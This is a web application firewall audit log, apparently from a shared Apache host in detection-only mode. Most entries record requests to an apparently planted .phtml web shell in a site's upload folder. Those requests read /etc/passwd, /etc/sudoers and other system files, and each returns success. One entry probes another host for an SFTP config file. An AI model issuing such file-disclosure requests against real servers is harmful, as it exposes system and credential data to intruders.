[tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6CO315LOn2YRwTZIj3uQAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975611662538 3978 (- - -) Stopwatch2: 1749975611662538 3978; combined=2158, p1=303, p2=1729, p3=37, p4=35, p5=54, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0054832a-Z-- --bc484379-A-- [15/Jun/2025:13:50:12.034299 +0530] aE6CPE86SWGxMlRL5UU3ZgAAAAU 216.73.216.83 33842 127.0.0.1 7081 --bc484379-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc&viewfile=%2F%2Fproc%2Fcpuinfo HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --bc484379-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3890 Connection: close Content-Type: text/html; charset=UTF-8 --bc484379-H-- Message: Warning. Matched phrase "proc/cpuinfo" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/cpuinfo found within ARGS:viewfile: /proc/cpuinfo"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/cpuinfo" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/cpuinfo found within ARGS:viewfile: /proc/cpuinfo"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6CPE86SWGxMlRL5UU3ZgAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975612028060 6320 (- - -) Stopwatch2: 1749975612028060 6320; combined=3057, p1=413, p2=2440, p3=80, p4=47, p5=76, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bc484379-Z-- --9a0de432-A-- [15/Jun/2025:13:50:12.229876 +0530] aE6CPN-DHezsSmx4Vom9DQAAAAI 216.73.216.83 33862 127.0.0.1 7081 --9a0de432-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fos-release HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9a0de432-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3158 Connection: close Content-Type: text/html; charset=UTF-8 --9a0de432-H-- Message: Warning. Matched phrase "etc/os-release" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/os-release found within ARGS:viewfile: /etc/os-release"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/os-release" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/os-release found within ARGS:viewfile: /etc/os-release"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6CPN-DHezsSmx4Vom9DQAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975612225675 4253 (- - -) Stopwatch2: 1749975612225675 4253; combined=2216, p1=344, p2=1736, p3=37, p4=44, p5=55, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9a0de432-Z-- --9002bc60-A-- [15/Jun/2025:13:51:23.978743 +0530] aE6Cg086SWGxMlRL5UU3fgAAAAU 216.73.216.83 56454 127.0.0.1 7081 --9002bc60-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fissue.net HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9002bc60-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2950 Connection: close Content-Type: text/html; charset=UTF-8 --9002bc60-H-- Message: Warning. Matched phrase "etc/issue" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/issue found within ARGS:viewfile: /etc/issue.net"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/issue" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/issue found within ARGS:viewfile: /etc/issue.net"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6Cg086SWGxMlRL5UU3fgAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975683974671 4126 (- - -) Stopwatch2: 1749975683974671 4126; combined=1979, p1=393, p2=1464, p3=33, p4=34, p5=55, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9002bc60-Z-- --842c246f-A-- [15/Jun/2025:13:52:28.814308 +0530] aE6CxE86SWGxMlRL5UU3ogAAAAU 216.73.216.83 55624 127.0.0.1 7081 --842c246f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc&viewfile=%2F%2Fproc%2Fmeminfo HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --842c246f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3468 Connection: close Content-Type: text/html; charset=UTF-8 --842c246f-H-- Message: Warning. Matched phrase "proc/meminfo" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/meminfo found within ARGS:viewfile: /proc/meminfo"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/meminfo" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/meminfo found within ARGS:viewfile: /proc/meminfo"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6CxE86SWGxMlRL5UU3ogAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975748809635 4728 (- - -) Stopwatch2: 1749975748809635 4728; combined=2375, p1=945, p2=1323, p3=35, p4=25, p5=47, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --842c246f-Z-- --9497df70-A-- [15/Jun/2025:13:52:29.288135 +0530] aE6CxbQynla1sJRjEuHBEQAAAAQ 216.73.216.83 55766 127.0.0.1 7081 --9497df70-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fsudoers HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --9497df70-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2931 Connection: close Content-Type: text/html; charset=UTF-8 --9497df70-H-- Message: Warning. Matched phrase "etc/sudoers" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sudoers found within ARGS:viewfile: /etc/sudoers"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/sudoers" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sudoers found within ARGS:viewfile: /etc/sudoers"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6CxbQynla1sJRjEuHBEQAAAAQ"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975749283916 4272 (- - -) Stopwatch2: 1749975749283916 4272; combined=2322, p1=445, p2=1753, p3=36, p4=35, p5=53, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9497df70-Z-- --395e0152-A-- [15/Jun/2025:13:52:36.842842 +0530] aE6CzE86SWGxMlRL5UU3pwAAAAU 44.214.19.8 35704 127.0.0.1 7081 --395e0152-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/postfix HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.214.19.8 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --395e0152-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4101 Connection: close Content-Type: text/html; charset=UTF-8 --395e0152-E-- --395e0152-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/postfix"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6CzE86SWGxMlRL5UU3pwAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/postfix"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6CzE86SWGxMlRL5UU3pwAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975756837855 5067 (- - -) Stopwatch2: 1749975756837855 5067; combined=2991, p1=347, p2=2436, p3=51, p4=42, p5=115, sr=95, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --395e0152-Z-- --0d54af5c-A-- [15/Jun/2025:13:53:12.888639 +0530] aE6C8LIQi_ruyWEJ7bFIlgAAAAk 216.73.216.83 33538 127.0.0.1 7081 --0d54af5c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Faliases HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --0d54af5c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2963 Connection: close Content-Type: text/html; charset=UTF-8 --0d54af5c-H-- Message: Warning. Matched phrase "etc/alias" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/alias found within ARGS:viewfile: /etc/aliases"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/alias" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/alias found within ARGS:viewfile: /etc/aliases"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6C8LIQi_ruyWEJ7bFIlgAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975792884578 4124 (- - -) Stopwatch2: 1749975792884578 4124; combined=1856, p1=322, p2=1423, p3=34, p4=27, p5=50, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0d54af5c-Z-- --f631f678-A-- [15/Jun/2025:13:53:13.420665 +0530] aE6C8fVbLd3MzwkmrE-KdAAAAAg 216.73.216.83 33600 127.0.0.1 7081 --f631f678-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fpasswd HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --f631f678-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4962 Connection: close Content-Type: text/html; charset=UTF-8 --f631f678-H-- Message: Warning. Matched phrase "etc/passwd" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/passwd found within ARGS:viewfile: /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/passwd" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/passwd found within ARGS:viewfile: /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6C8fVbLd3MzwkmrE-KdAAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975793416724 3993 (- - -) Stopwatch2: 1749975793416724 3993; combined=1999, p1=358, p2=1508, p3=32, p4=50, p5=51, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f631f678-Z-- --8f642c50-A-- [15/Jun/2025:13:53:16.734980 +0530] aE6C9E86SWGxMlRL5UU3ugAAAAU 3.232.39.98 34210 127.0.0.1 7081 --8f642c50-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/php8.1-fpm HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.232.39.98 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --8f642c50-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4661 Connection: close Content-Type: text/html; charset=UTF-8 --8f642c50-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/php8.1-fpm"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6C9E86SWGxMlRL5UU3ugAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/php8.1-fpm"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6C9E86SWGxMlRL5UU3ugAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975796730894 4146 (- - -) Stopwatch2: 1749975796730894 4146; combined=2272, p1=348, p2=1774, p3=34, p4=36, p5=80, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8f642c50-Z-- --56803128-A-- [15/Jun/2025:13:53:20.232504 +0530] aE6C-H15LOn2YRwTZIj4FQAAAAc 44.210.204.255 54172 127.0.0.1 7081 --56803128-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/apport HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.210.204.255 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --56803128-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4151 Connection: close Content-Type: text/html; charset=UTF-8 --56803128-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/apport"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6C-H15LOn2YRwTZIj4FQAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/apport"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6C-H15LOn2YRwTZIj4FQAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975800228582 3994 (- - -) Stopwatch2: 1749975800228582 3994; combined=2113, p1=351, p2=1559, p3=34, p4=34, p5=135, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --56803128-Z-- --28e1a77e-A-- [15/Jun/2025:13:54:29.814316 +0530] aE6DPE0nW1houYLyuKrKHgAAAA0 35.181.43.144 36456 127.0.0.1 7081 --28e1a77e-B-- GET /sftp-config.json HTTP/1.0 Host: nw.cstechns.com X-Real-IP: 35.181.43.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --28e1a77e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://nw.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --28e1a77e-H-- Message: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "nw.cstechns.com"] [uri "/sftp-config.json"] [unique_id "aE6DPE0nW1houYLyuKrKHgAAAA0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/nw.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749975868585661 1228738 (- - -) Stopwatch2: 1749975868585661 1228738; combined=2463, p1=856, p2=1496, p3=0, p4=0, p5=110, sr=170, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --28e1a77e-Z-- --b3d47b1b-A-- [15/Jun/2025:13:55:54.816069 +0530] aE6DkvVbLd3MzwkmrE-KsAAAAAg 216.73.216.83 41650 127.0.0.1 7081 --b3d47b1b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fetc&viewfile=%2F%2Fetc%2Fadduser.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.83 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --b3d47b1b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4305 Connection: close Content-Type: text/html; charset=UTF-8 --b3d47b1b-H-- Message: Warning. Matched phrase "etc/adduser.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/adduser.conf found within ARGS:viewfile: /etc/adduser.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/adduser.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/adduser.conf found within ARGS:viewfile: /etc/adduser.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6DkvVbLd3MzwkmrE-KsAAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1749975954811993 4130 (- - -) Stopwatch2: 1749975954811993 4130; combined=1900, p1=395, p2=1384, p3=31, p4=34, p5=56, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b3d47b1b-Z-- 